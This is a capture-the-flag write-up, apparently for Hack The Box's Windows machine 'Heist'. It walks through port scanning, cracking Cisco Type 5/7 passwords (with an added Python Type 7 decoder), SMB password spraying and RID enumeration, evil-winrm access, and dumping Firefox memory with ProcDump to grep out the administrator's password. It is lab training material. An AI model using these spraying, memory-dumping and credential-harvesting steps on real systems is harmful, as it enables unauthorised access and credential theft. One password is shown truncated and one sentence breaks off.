Heist Writeup
Machine Information
| Machine | Description |
|---|---|
| Name | Heist |
| OS | Windows |
| Difficulty | Easy |
| Author | MinatoTW |
Recon
Service scan
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ sudo nmap -p- -Pn --min-rate 6969 10.129.96.157
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 03:32 EST
Nmap scan report for 10.129.96.157
Host is up (0.056s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
5985/tcp open wsman
49669/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ sudo nmap -p80,135,445,5985,49669 -sCV -Pn 10.129.96.157
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 03:55 EST
Nmap scan report for 10.129.96.157
Host is up (0.056s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-12-23T08:56:19
|_ start_date: N/A
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.31 seconds
The scan shows five open ports: HTTP, SMB, WinRM (5985), and the rest are unimportant. The HTTP server is IIS 10.0, which suggests the system is Windows 10 (or Server 2016); further down, the session cookie is PHPSESSID, so the back end is PHP.
HTTP - Port 80
Not knowing the site's hostname, I browse directly to the IP.

The server redirects to /login.php. Since there is no way to create an account, I use the "Login as guest" link at the bottom left to log in as a guest.

This reveals that the user Hazard could not configure a Cisco router properly, asked Support for help, and attached the configuration file (under Attachment).
Other things done at this stage
- Black-box testing of the web app found no weakness, and the back end has no database at all.
- Not knowing the target's domain name, I could only guess the account was [email protected] and try brute-forcing it, which failed.
Brute-forcing the Cisco passwords
Naturally, let's look at what the config file contains!

It contains usernames and password hashes.
At this point, anyone who has never touched Cisco network gear may find it hard to continue, but you should at least be able to guess that the hashes need cracking, since $1$... is obviously an MD5 hash.
What is in the config file?
It uses two encryption methods: Type 5, which uses MD5 (secret 5), and Type 7, which uses the Vigenère cipher (password 7). Both are weak: MD5 can be brute-forced, and the Vigenère cipher is an XOR scheme that can also be broken.
For the other Cisco types, see the KB.
As for how I knew this kind of Cisco password can be cracked? At a job long ago I had to take over a predecessor's mess with no credentials handed over, and luckily the gear was old enough to crack QQ
Simply searching the hash online yields the first password.

For the other two Type 7 passwords, use a decoding script from GitHub, or, if you are lazy, a site like this one can recover the password.
A script is recommended; you never know whether a website is harvesting passwords.
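To show concretely why Type 7 is recovered rather than cracked, here is an added Python example (not part of the original writeup and not taken from any tool it links): a Type 7 decoder, its matching encoder, and a small config auditor that decodes `password 7` lines and merely flags `secret 5` lines. The XOR key and layout are Cisco's well-known public ones; the sample config and its values are constructed for this example, not Hazard's file.

```python
# Added example (not from the writeup): Cisco Type 7 is a fixed-key XOR, not a hash,
# which is why "password 7" values are recovered rather than cracked.
import re

# The constant key every IOS device uses for Type 7; it has been public for decades.
_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

def type7_decode(encoded: str) -> str:
    """Layout: two decimal digits = start index into _KEY, then one hex byte per
    plaintext character, each XORed with _KEY[(offset + i) % len(_KEY)]."""
    if not re.fullmatch(r"\d{2}(?:[0-9A-Fa-f]{2})+", encoded):
        raise ValueError("not a Type 7 string: need 2 digits + hex pairs")
    offset = int(encoded[:2])
    if offset >= len(_KEY):
        raise ValueError("Type 7 offset out of range")
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ _KEY[(offset + i) % len(_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")

def type7_encode(plaintext: str, offset: int = 0) -> str:
    """Inverse of type7_decode; XOR is symmetric, so the same loop applies."""
    if not 0 <= offset < len(_KEY):
        raise ValueError("Type 7 offset out of range")
    data = plaintext.encode("ascii")
    enc = bytes(b ^ _KEY[(offset + i) % len(_KEY)] for i, b in enumerate(data))
    return f"{offset:02d}{enc.hex().upper()}"

def audit_config(config_text: str) -> dict:
    """Classify credential lines in a running-config the way a reviewer would:
    Type 7 values are decoded on the spot (reversible); Type 5 values are only
    flagged, since $1$ is salted MD5-crypt and would need offline guessing."""
    findings = {"type7": {}, "type5": []}
    for raw in config_text.splitlines():
        line = raw.strip()
        m7 = re.search(r"\bpassword 7 ([0-9A-Fa-f]+)$", line)
        if m7:
            findings["type7"][line] = type7_decode(m7.group(1))
            continue
        m5 = re.search(r"\bsecret 5 (\$1\$\S+)$", line)
        if m5:
            findings["type5"].append(m5.group(1))
    return findings

# Constructed sample config with placeholder values (not Hazard's real file).
SAMPLE_CONFIG = """\
enable secret 5 $1$SALT$PLACEHOLDERHASH
username admin password 7 060506324F41
username guest password 7 03085E1F0B0A2842
"""
```

Calling `audit_config(SAMPLE_CONFIG)` decodes both Type 7 values immediately and leaves the Type 5 hash as a finding to be handled offline, which is exactly the distinction the config review above relies on.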
Password spraying Part 1
Try the collected usernames and passwords in every combination.
WinRM gave nothing, but SMB hit!
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u user.txt -p pass.txt
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agen
Got Hazard's password!
Internal recon Part 1
SMB share enumeration
No luck; there is nothing readable.
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u Hazard -p stealth1agent --shares
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [*] Enumerated shares
SMB 10.129.96.157 445 SUPPORTDESK Share Permissions Remark
SMB 10.129.96.157 445 SUPPORTDESK ----- ----------- ------
SMB 10.129.96.157 445 SUPPORTDESK ADMIN$ Remote Admin
SMB 10.129.96.157 445 SUPPORTDESK C$ Default share
SMB 10.129.96.157 445 SUPPORTDESK IPC$ READ Remote IPC
RID user enumeration
After many attempts, RID brute-forcing finally enumerated the users.
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u Hazard -p stealth1agent --rid-brute
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK 500: SUPPORTDESK\Administrator (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 501: SUPPORTDESK\Guest (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 513: SUPPORTDESK\None (SidTypeGroup)
SMB 10.129.96.157 445 SUPPORTDESK 1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1009: SUPPORTDESK\support (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1012: SUPPORTDESK\Chase (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1013: SUPPORTDESK\Jason (SidTypeUser)
New accounts found! I collect them into a new user list.
Password spraying Part 2
Try again with every combination.
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u user2.txt -p pass.txt --continue-on-success
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\None:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\DefaultAccount:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\None:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\DefaultAccount:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] Connection Error: Error occurs while reading from remote(104)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
Hit! Got Chase's password.
WinRM login as Chase
Since Hazard
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ evil-winrm -i 10.129.96.157 -u Chase -p "Q4)sJu\Y8qz*A3?d"
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> type ..\Desktop\user.txt
0e6d4756a8bd6019369427c72e67a0b7
Internal recon Part 2
Search for other interesting files.
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir
Directory: C:\Users\Chase\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2019 9:08 AM 121 todo.txt
-ar--- 12/23/2024 1:59 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Chase\Desktop> type tod*
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
Reading todo.txt on the desktop reveals that the administrator periodically checks the issues, i.e. the page where the Cisco config file was obtained earlier.
Website source code
After cd into C:\inetpub\, there is no permission to list the directory (dir fails), but files can be read directly (a guess), such as login.php.
*Evil-WinRM* PS C:\inetpub\wwwroot> type lo*
<!DOCTYPE html>
<html lang="en" >
...
<?php
session_start();
if( isset($_REQUEST['login']) && !empty($_REQUEST['login_username']) && !empty($_REQUEST['login_password'])) {
if( $_REQUEST['login_username'] === '[email protected]' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {
$_SESSION['admin'] = "valid";
header('Location: issues.php');
}
else
header('Location: errorpage.php');
}
else if( isset($_GET['guest']) ) {
if( $_GET['guest'] === 'true' ) {
$_SESSION['guest'] = "valid";
header('Location: issues.php');
}
}
?>
</html>
This yields the sha256 hash of admin's password. I don't want to brute-force it, since that mostly goes nowhere; if there is no other route, it is not too late to come back and crack it.
Process listing
Finally, under C:\Program Files\ I found that Firefox is installed on this machine. Could the administrator be viewing the issues from this very machine? So I list the currently running processes.
*Evil-WinRM* PS C:\Users\Chase\Documents> Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
ProcessName Id
----------- --
csrss 360
csrss 476
ctfmon 2120
dllhost 3852
dllhost 6772
dwm 952
explorer 948
firefox 4364
firefox 6460
firefox 6568
firefox 6704
firefox 6980
...
And indeed there is.
Dumping Firefox's memory
There are countless ways to dump memory; here I use Microsoft's ProcDump[1] to capture the memory of the newest Firefox process.
*Evil-WinRM* PS C:\Users\Chase\Documents> upload /home/kali/Documents/tools/procdump.exe
Info: Uploading /home/kali/Documents/tools/procdump.exe to C:\Users\Chase\Documents\procdump.exe
Data: 1055944 bytes of 1055944 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Documents> ./procdump.exe -accepteula
...
*Evil-WinRM* PS C:\Users\Chase\Documents> ./procdump.exe -ma 6980
ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[16:47:30] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_241223_164730.dmp
[16:47:31] Dump 1 writing: Estimated dump file size is 307 MB.
[16:47:32] Dump 1 complete: 308 MB written in 1.4 seconds
[16:47:32] Dump count reached.
Filtering the memory contents
Firefox's memory holds the user's browsing history, which may contain sensitive information. From the login.php source viewed earlier, the password is submitted as login_password=<PASSWORD>, so I filter the memory dump on that pattern.
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ rg -ao 'login_password=([^&]+)' firefox.exe_241223_164730.dmp
2696:login_password=4dD!5}x/re8]FBuZ
2896:login_password=4dD!5}x/re8]FBuZ
2896:login_password=4dD!5}x/re8]FBuZ
Administrator password obtained.
Logging in as Administrator
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ evil-winrm -i 10.129.96.157 -u Administrator -p "4dD\!5}x/re8]FBuZ"
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Des*/*.txt
e3254f34e1f191af2cefaf1f4a8b6224
-
1. A Microsoft-signed native tool that can capture a process's memory contents. Sysinternals - ProcDump, Microsoft ↩